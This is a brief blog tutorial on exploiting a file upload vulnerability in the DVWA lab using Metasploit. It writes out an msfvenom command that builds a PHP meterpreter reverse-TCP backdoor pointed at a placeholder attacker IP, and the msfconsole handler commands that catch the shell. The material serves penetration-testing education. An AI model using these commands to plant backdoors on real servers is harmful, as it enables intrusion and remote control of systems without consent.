Hello all, as we know that what is file upload vulnerability and it’s security impacts as well as we already other tools used to create backdoor like weevely https://pentestguy.in/weevely-file-upload-vulnerability-dvwa/
Now here we are again talking about the another method of file upload vulnerability for that we are going to use one of the most popular hacking tool none other than metasploit framework. which use in various kind of penetration testing like network,web.
First we are going to create backdoor or you can say that it’s our shell that we are going to upload later on our DVWA environment to take control of it. Obviously it’s depends on the environment here we are going to create a .php backdoor by using msfvenom.
msfvenom -p php/meterpreter/reverse_tcp LHOST=[attacker IP] LPORT=[Port Number] -f raw > shellname.php
After creation need to upload it on DVWA for testing purposes,we can try with different security priority options like low,medium.
We need to start handler by using we can able to command our backdoor to perform various kind of operations possible at low privilege user or we can say it’s depends on priority. To start handler can control session we need to follow steps given below.
msfconsole use exploit/multi/handler set lhost [Attacker IP] set port [Port Number] exploit